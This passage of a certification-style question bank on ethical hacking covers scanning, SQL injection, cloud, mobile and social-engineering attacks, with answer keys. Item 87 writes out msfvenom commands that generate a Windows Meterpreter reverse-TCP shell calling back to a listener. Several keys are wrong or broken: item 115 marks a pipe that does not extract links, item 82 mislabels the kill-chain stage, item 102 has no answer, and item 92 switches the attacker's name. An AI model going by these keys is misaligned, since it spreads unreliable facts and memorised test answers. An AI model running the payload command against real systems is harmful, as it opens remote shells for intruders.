sender identities, mail servers, sender IP addresses, and sender locations from
different public sources. He also checks if an email address was leaked using the
haveibeenpwned.com API. Which of the following tools is used by Wilson in the above
scenario?
A. Factiva
B. ZoomInfo
C. Netcraft
D. Infoga
Correct Answer: D

81.Bob, an attacker, has managed to access a target IoT device. He employed an
online tool to gather information related to the model of the IoT device and the
certifications granted to it. Which of the following tools did Bob employ to gather
the above information?
A. FCC ID search
B. Google image search
C. search.com
D. EarthExplorer
Correct Answer: A

82.You are a penetration tester working to test the user awareness of the employees
of the client XYZ. You harvested two employees' emails from some public sources and
are creating a client-side backdoor to send it to the employees via email. Which
stage of the cyber kill chain are you at?
A. Reconnaissance
B. Weaponization
C. Command and control
D. Exploitation
Correct Answer: D

83.Sam is working as a system administrator in an organization. He captured the
principal characteristics of a vulnerability and produced a numerical score to
reflect its severity using CVSS v3.0 to properly assess and prioritize the
organization's vulnerability management processes. The base score that Sam obtained
after performing CVSS rating was 4.0. What is the CVSS severity level of the
vulnerability discovered by Sam in the above scenario?
A. Critical
B. Medium
C. High
D. Low
Correct Answer: B

84.SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests,
which may bypass authentication and allow attackers to access and/or modify data
attached to a web application. Which of the following SQLi types leverages a
database server's ability to make DNS requests to pass data to an attacker?
A. In-band SQLi
B. Union-based SQLi
C. Out-of-band SQLi
D. Time-based blind SQLi
Correct Answer: C

85.Which type of virus can change its own code and then cipher itself multiple
times as it replicates?
A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus
Correct Answer: A

86.What is the port to block first in case you are suspicious that an IoT device
has been compromised?
A. 22
B. 48101
C. 80
D. 443
Correct Answer: B

87.What is the correct way of using MSFvenom to generate a reverse TCP shellcode
for Windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
Correct Answer: C

88.Samuel, a security administrator, is assessing the configuration of a web
server. He noticed that the server permits SSLv2 connections, and the same private
key certificate is used on a different server that allows SSLv2 connections. This
vulnerability makes the web server vulnerable to attacks as the SSLv2 server can
leak key information. Which of the following attacks can be performed by exploiting
the above vulnerability?
A. Padding oracle attack
B. DROWN attack
C. DUHK attack
D. Side-channel attack
Correct Answer: B

89.Techno Security Inc. recently hired John as a penetration tester. He was tasked
with identifying open ports in the target network and determining whether the ports
are online and any firewall rule sets are encountered. John decided to perform a
TCP SYN ping scan on the target network. Which of the following Nmap commands must
John use to perform the TCP SYN ping scan?
A. nmap -sn -PO < target IP address >
B. nmap -sn -PS < target IP address >
C. nmap -sn -PA < target IP address >
D. nmap -sn -PP < target IP address >
Correct Answer: B

90.Alice, a professional hacker, targeted an organization's cloud services. She
infiltrated the target's MSP provider by sending spear-phishing emails and
distributed custom-made malware to compromise user accounts and gain remote access
to the cloud service. Further, she accessed the target customer profiles with her
MSP account, compressed the customer data, and stored them in the MSP. Then, she
used this information to launch further attacks on the target organization. Which
of the following cloud attacks did Alice perform in the above scenario?
A. Cloud cryptojacking
B. Man-in-the-cloud (MITC) attack
C. Cloud hopper attack
D. Cloudborne attack
Correct Answer: C

91.John, a professional hacker, targeted an organization that uses LDAP for
accessing distributed directory services. He used an automated tool to anonymously
query the LDAP service for sensitive information such as usernames, addresses,
departmental details, and server names to launch further attacks on the target
organization. What is the tool employed by John to gather information from the LDAP
service?
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer
Correct Answer: C

92.Johnson, an attacker, performed online research for the contact details of
reputed cybersecurity firms. He found the contact number of sibertech.org and
dialed the number, claiming himself to represent a technical support team from a
vendor. He warned that a specific server is about to be compromised and requested
sibertech.org to follow the provided instructions. Consequently, he prompted the
victim to execute unusual commands and install malicious files, which were then
used to collect and pass critical information to Johnson's machine. What is the
social engineering technique Steve employed in the above scenario?
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing
Correct Answer: B

93.To create a botnet, the attacker can use several techniques to scan vulnerable
machines. The attacker first collects information about a large number of
vulnerable machines to create a list. Subsequently, they infect the machines. The
list is divided by assigning half of the list to the newly compromised machines.
The scanning process runs simultaneously. This technique ensures the spreading and
installation of malicious code in little time. Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique
D. Topological scanning technique
Correct Answer: C

94.Louis, a professional hacker, had used specialized tools or search engines to
encrypt all his browsing activity and navigate anonymously to obtain
sensitive/hidden information about official government or federal databases. After
gathering the information, he successfully performed an attack on the target
government organization without being traced. Which of the following techniques is
described in the above scenario?
A. Website footprinting
B. Dark web footprinting
C. VPN footprinting
D. VoIP footprinting
Correct Answer: B

95.An organization is performing a vulnerability assessment for mitigating threats.
James, a pen tester, scanned the organization by building an inventory of the
protocols found on the organization's machines to detect which ports are attached
to services such as an email server, a web server, or a database server. After
identifying the services, he selected the vulnerabilities on each machine and
started executing only the relevant tests. What is the type of vulnerability
assessment solution that James employed in the above scenario?
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment
Correct Answer: D

96.Dorian is sending a digitally signed email to Poly. With which key is Dorian
signing this message and how is Poly validating it?
A. Dorian is signing the message with his public key, and Poly will verify that the
message came from Dorian by using Dorian's private key.
B. Dorian is signing the message with Poly's private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
D. Dorian is signing the message with Poly's public key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
Correct Answer: C

97.At what stage of the cyber kill chain theory model does data exfiltration occur?
A. Weaponization
B. Actions on objectives
C. Command and control
D. Installation
Correct Answer: B

98.Heather's company has decided to use a new customer relationship management
tool. After performing the appropriate research, they decided to purchase a
subscription to a cloud-hosted solution. The only administrative task that Heather
will need to perform is the management of user accounts. The provider will take
care of the hardware, operating system, and software administration including
patching and monitoring. Which of the following is this type of solution?
A. IaaS
B. SaaS
C. PaaS
D. CaaS
Correct Answer: B

99.Infecting a system with malware and using phishing to gain credentials to a
system or web application are examples of which phase of the ethical hacking
methodology?
A. Scanning
B. Gaining access
C. Maintaining access
D. Reconnaissance
Correct Answer: B

100.Mr. Omkar performed tool-based vulnerability assessment and found two
vulnerabilities. During analysis, he found that these issues are not true
vulnerabilities. What will you call these issues?
A. False positives
B. True negatives
C. True positives
D. False negatives
Correct Answer: A

101.Which file is a rich target to discover the structure of a website during web-
server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html
Correct Answer: B

102.Andrew is an Ethical Hacker who was assigned the task of discovering all the
active devices hidden by a restrictive firewall in the IPv4 range in a given target
network. Which of the following host discovery techniques must he use to perform
the given task?
A. UDP scan
B. ARP ping scan
C. ACK flag probe scan
D. TCP Maimon scan
Correct Answer:

103.An organization has automated the operation of critical infrastructure from a
remote location. For this purpose, all the industrial control systems are connected
to the Internet. To empower the manufacturing process, ensure the reliability of
industrial networks, and reduce downtime and service disruption, the organization
decided to install an OT security tool that further protects against security
incidents such as cyber espionage, zero-day attacks, and malware. Which of the
following tools must the organization employ to protect its critical
infrastructure?
A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer
Correct Answer: C
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A.Robotium -->> Android
B.BalenaCloud -->> Cloud provider
C.Flowmon -->> OT security. Flowmon empowers manufacturers and utility companies to
ensure the reliability of their industrial networks confidently to avoid downtime
and disruption of service continuity. This can be achieved by continuous monitoring
and anomaly detection so that malfunctioning devices or security incidents, such as
cyber espionage, zero-days, or malware, can be reported and remedied as quickly as
possible.
D.IntentFuzzer -->> Android

104.Bella, a security professional working at an IT firm, finds that a security
breach has occurred while transferring important files. Sensitive data, employee
usernames, and passwords are shared in plaintext, paving the way for hackers to
perform successful session hijacking. To address this situation, Bella implemented
a protocol that sends data using encryption and digital certificates. Which of the
following protocols is used by Bella?
A. FTPS
B. FTP
C. HTTPS
D. IP
Correct Answer: A
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Among the approaches that cause vulnerability to session hijacking and their
preventative solutions: instead of FTP, use FTPS.
Implementing these protocols reduces the chance of a successful hijack by sending
data using encryption and digital certificates.

105.Kevin, a professional hacker, wants to penetrate CyberTech Inc's network. He
employed a technique, using which he encoded packets with Unicode characters. The
company's IDS cannot recognize the packets, but the target web server can decode
them. What is the technique used by Kevin to evade the IDS system?
A. Session splicing
B. Urgency flag
C. Obfuscating
D. Desynchronization
Correct Answer: C

106.Jim, a professional hacker, targeted an organization that is operating critical
industrial infrastructure. Jim used Nmap to scan open ports and running services on
systems connected to the organization's OT network. He used an Nmap command to
identify Ethernet/IP devices connected to the Internet and further gathered
information such as the vendor name, product code and name, device name, and IP
address. Which of the following Nmap commands helped Jim retrieve the required
information?
A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >
B. nmap -Pn -sU -p 44818 --script enip-info < Target IP >
C. nmap -Pn -sT -p 46824 < Target IP >
D. nmap -Pn -sT -p 102 --script s7-info < Target IP >
Correct Answer: B

107.In this form of encryption algorithm, every individual block contains 64-bit
data, and three keys are used, where each key consists of 56 bits. Which is this
encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm
Correct Answer: B

108.Sam is a penetration tester hired by Inception Tech, a security organization.
He was asked to perform port scanning on a target host in the network. While
performing the given task, Sam sends FIN/ACK probes and determines that an RST
packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?
A. Xmas scan
B. IDLE/IPID header scan
C. TCP Maimon scan
D. ACK flag probe scan
Correct Answer: C

109.Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this
organization to perform sophisticated attacks and bring down its reputation in the
market. To launch the attacks process, he performed DNS footprinting to gather
information about DNS servers and to identify the hosts connected in the target
network. He used an automated tool that can retrieve information about DNS zone
data including DNS domain names, computer names, IP addresses, DNS records, and
network Whois records. He further exploited this information to launch other
sophisticated attacks. What is the tool employed by Gerard in the above scenario?
A. Towelroot
B. Knative
C. zANTI
D. Bluto
Correct Answer: D

110.Steven connected his iPhone to a public computer that had been infected by
Clark, an attacker. After establishing the connection with the public computer,
Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue
communication with that computer even after being physically disconnected. Now,
Clark gains access to Steven's iPhone through the infected computer and is able to
monitor and read all of Steven's activity on the iPhone, even after the device is
out of the communication zone. Which of the following attacks is performed by Clark
in the above scenario?
A. Man-in-the-disk attack
B. iOS jailbreaking
C. iOS trustjacking
D. Exploiting SS7 vulnerability
Correct Answer: C

111.John, a professional hacker, decided to use DNS to perform data exfiltration on
a target network. In this process, he embedded malicious data into the DNS protocol
packets that even DNSSEC cannot detect. Using this technique, John successfully
injected malware to bypass a firewall and maintained communication with the victim
machine and C&C server. What is the technique employed by John to bypass the
firewall?
A. DNSSEC zone walking
B. DNS cache snooping
C. DNS enumeration
D. DNS tunneling method
Correct Answer: D

112.Abel, a cloud architect, uses container technology to deploy
applications/software including all its dependencies, such as libraries and
configuration files, binaries, and other resources that run independently from
other processes in the cloud environment. For the containerization of applications,
he follows the five-tier container technology architecture. Currently, Abel is
verifying and validating image contents, signing images, and sending them to the
registries. Which of the following tiers of the container technology architecture
is Abel currently working in?
A. Tier-1: Developer machines
B. Tier-2: Testing and accreditation systems
C. Tier-3: Registries
D. Tier-4: Orchestrators
Correct Answer: B

113.Taylor, a security professional, uses a tool to monitor her company's website,
analyze the website's traffic, and track the geographical location of the users
visiting the company's website. Which of the following tools did Taylor employ in
the above scenario?
A. Webroot
B. Web-Stat
C. WebSite-Watcher
D. WAFW00F
Correct Answer: B

114.Attacker Rony installed a rogue access point within an organization's perimeter
and attempted to intrude into its internal network. Johnson, a security auditor,
identified some unusual traffic in the internal network that is aimed at cracking
the authentication mechanism. He immediately turned off the targeted network and
tested for any weak and outdated security mechanisms that are open to attack. What
is the type of vulnerability assessment performed by Johnson in the above scenario?
A. Wireless network assessment
B. Application assessment
C. Host-based assessment
D. Distributed assessment
Correct Answer: A

115.You start performing a penetration test against a specific website and have
decided to start from grabbing all the links from the main page. What is the best
Linux pipe to achieve your milestone?
A. wget https://site.com | grep "<a href=\"http" | grep "site.com"
B. curl -s https://site.com | grep "<a href=\"http" | grep "site.com" | cut -d "\"" -f 2
C. dirb https://site.com | grep "site"
D. wget https://site.com | cut -d "http"
Correct Answer: A

116.Joe works as an IT administrator in an organization and has recently set up a
cloud computing service for the organization. To implement this service, he reached
out to a telecom company for providing Internet connectivity and transport services
between the organization and the cloud service provider. In the NIST cloud
deployment reference architecture, under which category does the telecom company
fall in the above scenario?
A. Cloud consumer
B. Cloud broker
C. Cloud auditor
D. Cloud carrier
Correct Answer: D

117.Don, a student, came across a gaming app in a third-party app store and
installed it. Subsequently, all the legitimate apps in his smartphone were replaced
by deceptive applications that appeared legitimate. He also received many
advertisements on his smartphone after installing the app. What is the attack
performed on Don in the above scenario?
A. SIM card attack
B. Clickjacking
C. SMS phishing attack
D. Agent Smith attack
Correct Answer: D
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Agent Smith attacks are carried out by luring victims into downloading and
installing malicious apps designed and published by attackers in the form of games,
photo editors, or other attractive tools from third-party app stores such as 9Apps.
Once the user has installed the app, the core malicious code inside the application
infects or replaces the legitimate apps in the victim’s mobile device through C&C commands.
The deceptive application replaces legitimate apps such as WhatsApp, SHAREit, and
MX Player with similar infected versions.
The application sometimes also appears to be an authentic Google product such as
Google Updater or Themes.
The attacker then produces a massive volume of irrelevant and fraudulent
advertisements on the victim’s device through the infected app for financial gain.
Attackers exploit these apps to steal critical information such as personal
information, credentials, and bank details, from the victim’s mobile device through
C&C commands.

118.This form of encryption algorithm is a symmetric key block cipher that is
characterized by a 128-bit block size, and its key size can be up to 256 bits.
Which among the following is this encryption algorithm?
A. HMAC encryption algorithm
B. Twofish encryption algorithm
C. IDEA
D. Blowfish encryption algorithm
Correct Answer: B

119.A DDoS attack is performed at layer 7 to take down web infrastructure. Partial
HTTP requests are sent to the web infrastructure or applications. Upon receiving a
partial request, the target servers open multiple connections and keep waiting
for the requests to complete. Which attack is being described here?
A. Desynchronization
B. Slowloris attack
C. Session splicing
D. Phlashing
Correct Answer: B

120.Boney, a professional hacker, targets an organization for financial benefits.
He performs an attack by sending his session ID using an MITM attack technique.
Boney first obtains a valid session ID by logging into a service and later feeds
the same session ID to the target employee. The session ID links the target
employee to Boney's account page without disclosing any information to the victim.
When the target employee clicks on the link, all the sensitive payment details
entered in a form are linked to Boney's account. What is the attack performed by
Boney in the above scenario?
A. Forbidden attack
B. CRIME attack
C. Session donation attack
D. Session fixation attack
Correct Answer: C
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In a session donation attack, the attacker donates their own session ID to the
target user. In this attack, the attacker first obtains a valid session ID by
logging into a service and later feeds the same session ID to the target user. This
session ID links a target user to the attacker’s account page without disclosing
any information to the victim. When the target user clicks on the link and enters
the details (username, password, payment details, etc.) in a form, the entered
details are linked to the attacker’s account. To initiate this attack, the attacker
can send their session ID using techniques such as cross-site cooking, an MITM
attack, and session fixation. A session donation attack involves the following
steps.
